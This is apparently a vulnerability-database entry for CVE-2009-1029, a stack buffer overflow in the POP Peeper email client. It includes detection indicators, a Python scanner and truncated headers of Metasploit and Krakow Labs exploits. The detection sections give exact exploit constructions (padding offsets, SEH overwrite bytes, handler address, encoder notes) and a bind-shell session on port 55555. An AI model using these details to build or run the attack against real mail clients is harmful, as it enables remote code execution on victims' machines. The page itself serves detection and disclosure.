CVE-2009-1029
Published 2009-03-20
Priority P356 · Severity: critical · CVSS 2.0 base score: 9.3
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit code available
EPSS: 31.84% (98.1st percentile)
Stack-based buffer overflow in POP Peeper 3.4.0.0 and earlier allows remote POP3 servers to execute arbitrary code via a long Date header, related to Imap.dll.
Affected
4 ranges (three of the indexed CPE entries carry no version data)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| poppeeper | pop_peeper | <= 3.4.0.0 | — |
Detection & IOCs (extracted from the sources listed below)
- command: `sploit = "+OK\r\n1 " + rand_text_alpha_upper(1072) + generate_seh_payload(target.ret) + "\r\n.\r\n"` (UIDL module)
- command: `sploit = "Date: " + rand_text_alpha_upper(132) + generate_seh_payload(target.ret) + "\r\n.\r\n"` (DATE module)
- bytes: 0x909006EB (nSEH record: short JMP +6 over the handler pointer plus two NOPs; EB 06 90 90 on the wire)
- bytes: 0x10014E39 (pop/pop/ret in Imap.dll, written as the SEH handler; 39 4E 01 10 on the wire)
- Detect oversized POP3 UIDL response lines: the UIDL exploit packs 1072 bytes of padding, the SEH record and the shellcode into a single unique-id. RFC 1939 limits a unique-id to 70 characters, so any UIDL line whose unique-id exceeds 70 characters is already a protocol violation, and one around 1072 bytes or longer matches this exploit.
- Detect oversized POP3 Date headers: a Date header whose value exceeds 132 bytes in a message delivered over POP3 (RETR or TOP) is far longer than any legitimate RFC 5322 date and matches this exploit's offset.
- Monitor POP3 server responses (TCP 110) for the SEH overwrite pattern: generate_seh_payload writes the nSEH dword 0x909006EB and the handler address 0x10014E39 little-endian, so the wire bytes are EB 06 90 90 39 4E 01 10, immediately followed by the encoded shellcode.
- The exploit's bad characters are NUL, LF, space and CR, so the payload is run through the alphanumeric-mixed encoder and the padding is uppercase letters: a run of hundreds of alphanumeric bytes with no spaces inside a UIDL unique-id or a Date value is a supporting signal. Do not require a purely alphanumeric match, since the encoder's GetPC stub still contains a few non-alphanumeric bytes.
- Flag rogue POP3 servers: the attacker hosts the listener on port 110 and the victim client connects to it. The Krakow Labs PoC delivers a bind shell on TCP 55555 (its header shows the nc session), so a new listener on 55555 on a host running POP Peeper may indicate successful exploitation; the Metasploit modules use whichever payload is configured, so that port is specific to the PoC.
- The SEH handler address 0x10014E39 is specific to the Imap.dll build bundled with POP Peeper 3.4. Because the DLL ships with the application and is not compiled with SafeSEH, the PoC treats it as universal across Windows versions (tested on XP SP3); it changes with any DLL rebuild or if the module is loaded at a base other than its default.
- The UIDL overflow needs 1072 bytes of padding before the SEH record, the Date overflow only 132; both offsets are specific to POP Peeper 3.4.0.0.
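As an added example (not code from this page, from Metasploit or from Krakow Labs), the detection items above turned into a small Python scanner. It reproduces the two response shapes the Metasploit modules send, with the string PAYLOAD standing in for shellcode, and then checks a CRLF-delimited server response for the little-endian SEH record, a UIDL unique-id over RFC 1939's 70-character limit, a Date value beyond the 132-byte offset, and a long alphanumeric run. The benign samples are constructed, not captured, and ALNUM_RUN_MIN is an assumed threshold.

```python
"""Detection logic for the CVE-2009-1029 exploit shapes, run over constructed
POP3 server responses (added example, not the page's own code)."""
import re
import struct

# SEH record as both Metasploit modules emit it via generate_seh_payload():
# nSEH = short JMP +6 over the handler pointer plus two NOPs (the dword
# 0x909006EB from the IOC list), then the Imap.dll pop/pop/ret address
# 0x10014E39 packed little-endian. On the wire: EB 06 90 90 39 4E 01 10.
NSEH_JMP = b"\xeb\x06\x90\x90"
IMAP_DLL_PPR = struct.pack("<I", 0x10014E39)
SEH_SIGNATURE = NSEH_JMP + IMAP_DLL_PPR

UIDL_OFFSET = 1072      # padding before the SEH record in the UIDL exploit
DATE_OFFSET = 132       # padding before the SEH record in the Date exploit
RFC1939_UID_MAX = 70    # RFC 1939 section 7: a unique-id is 1 to 70 characters
ALNUM_RUN_MIN = 132     # assumption: flag alphanumeric runs at least this long

_UIDL_LINE = re.compile(rb"(\d+) (\S+)")                 # "<msgnum> <unique-id>"
_DATE_HDR = re.compile(rb"Date:[ \t]*(.*)", re.IGNORECASE)
_ALNUM_RUN = re.compile(rb"[A-Za-z0-9]{%d,}" % ALNUM_RUN_MIN)


def build_uidl_exploit(payload=b"PAYLOAD"):
    """Mirror the UIDL module's response shape; 'payload' stands in for shellcode."""
    return b"+OK\r\n1 " + b"A" * UIDL_OFFSET + SEH_SIGNATURE + payload + b"\r\n.\r\n"


def build_date_exploit(payload=b"PAYLOAD"):
    """Mirror the DATE module's response shape (one header line of a RETR reply)."""
    return b"Date: " + b"A" * DATE_OFFSET + SEH_SIGNATURE + payload + b"\r\n.\r\n"


def scan_pop3_response(data: bytes) -> list:
    """Return findings ("kind: detail") for one CRLF-delimited server response."""
    findings = []
    # Whole-response check: the SEH record is position-independent, so match
    # the exact 8 wire bytes rather than the dwords as integers.
    if SEH_SIGNATURE in data:
        findings.append("seh_overwrite_pattern: EB 06 90 90 39 4E 01 10 present")
    for line in data.split(b"\r\n"):
        m = _UIDL_LINE.fullmatch(line)
        if m and len(m.group(2)) > RFC1939_UID_MAX:
            findings.append(
                f"oversized_uidl: unique-id is {len(m.group(2))} bytes, "
                f"RFC 1939 allows at most {RFC1939_UID_MAX}")
        m = _DATE_HDR.fullmatch(line)
        if m and len(m.group(1)) > DATE_OFFSET:
            findings.append(
                f"oversized_date_header: value is {len(m.group(1))} bytes, "
                f"exploit offset is {DATE_OFFSET}")
        run = _ALNUM_RUN.search(line)
        if run:
            findings.append(
                f"long_alnum_run: {len(run.group(0))} consecutive alphanumeric bytes")
    return findings


def finding_kinds(data: bytes) -> set:
    """Just the finding kinds, convenient for rules and tests."""
    return {f.split(":", 1)[0] for f in scan_pop3_response(data)}


# Constructed benign traffic (not captured): a normal UIDL listing using the
# RFC 1939 example identifiers, and a small RETR reply with a sane Date header.
BENIGN_UIDL = b"+OK\r\n1 whqtswO00WBw418f9t5JxYwZ\r\n2 QhdPYR:00WBw1Ph7x7\r\n.\r\n"
BENIGN_RETR = (b"+OK 96 octets\r\n"
               b"Date: Fri, 13 Mar 2009 10:00:00 +0100\r\n"
               b"From: alice@example.com\r\n"
               b"Subject: hello\r\n\r\nbody\r\n.\r\n")

if __name__ == "__main__":
    for name, sample in [("benign UIDL", BENIGN_UIDL), ("benign RETR", BENIGN_RETR),
                         ("UIDL exploit", build_uidl_exploit()),
                         ("Date exploit", build_date_exploit())]:
        print(name, scan_pop3_response(sample) or "clean")
```

The unique-id check fires on any RFC 1939 violation, not only on this exploit's 1072-byte padding, because the shorter threshold is what a rule should key on; the alphanumeric-run check is deliberately a weak, supporting signal.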
No detection rules found.
Exploit-DB
POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)
exploitdb · 2010-11-30
---
```ruby
##
# $Id: poppeeper_uidl.rb 11180 2010-11-30 20:19:18Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote

  # Acts as the POP3 server (the victim client connects in) and builds the
  # SEH overwrite with the Seh mixin's generate_seh_payload().
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'POP Peeper v3.4 UIDL Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in POP Peeper v3.4.
          When a specially crafted UIDL string is sent to a client,
          an attacker may be able to execute arbitrary code. This
          module is based off of krakowlabs code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 11180 $',
      'References'     =>
        [
          [ 'OSVDB', '53559
```
Exploit-DB
POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
exploitdb · 2010-11-11
---
```ruby
##
# $Id: poppeeper_date.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote

  # Acts as the POP3 server (the victim client connects in) and builds the
  # SEH overwrite with the Seh mixin's generate_seh_payload().
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'POP Peeper v3.4 DATE Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in POP Peeper v3.4.
          When a specially crafted DATE string is sent to a client,
          an attacker may be able to execute arbitrary code. This
          module is based off of krakowlabs code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 10998 $',
      'References'     =>
        [
          [ 'CVE', '2009-10
```
Exploit-DB
POP Peeper 3.4.0.0 - Date Remote Buffer Overflow
exploitdb · 2009-03-12
---
```perl
#!/usr/bin/perl
# KL0309EXP-poppeeper_date-bof.pl
# 03.12.2009
# Krakow Labs Development [www.krakowlabs.com]
# POP Peeper 3.4.0.0 Date Remote Buffer Overflow Exploit
#
# SEH overwrite exploitation, uses Imap.dll (included with POP Peeper) for universal
# exploitation (more love for no /SafeSEH). Tested on Windows XP SP3.
#
# rush@KL (Jeremy Brown) [[email protected]]
#
# rush@linux:~$ sudo perl KL0309EXP-poppeeper_date-bof.pl
# xx.xx.xx.xx
# rush@linux:~$ nc xx.xx.xx.xx 55555
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\POP Peeper>exit
# exit
# rush@linux:~$
#
# Associated Files & Information:
# http://www.krakowlabs.com/res/adv/KL0309ADV-poppeeper_date-bof.txt
# http://www
```
Metasploit
POP Peeper v3.4 DATE Buffer Overflow
This module exploits a stack buffer overflow in POP Peeper v3.4. When a specially crafted DATE string is sent to a client, an attacker may be able to execute arbitrary code. This module is based off of krakowlabs code.

Metasploit
POP Peeper v3.4 UIDL Buffer Overflow
This module exploits a stack buffer overflow in POP Peeper v3.4. When a specially crafted UIDL string is sent to a client, an attacker may be able to execute arbitrary code. This module is based off of krakowlabs code.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/34077
- http://www.krakowlabs.com/res/adv/KL0309ADV-poppeeper_date-bof.txt
- http://www.securityfocus.com/archive/1/501701/100/0/threaded
- http://www.securityfocus.com/bid/34093
- https://exchange.xforce.ibmcloud.com/vulnerabilities/49215
- https://www.exploit-db.com/exploits/8203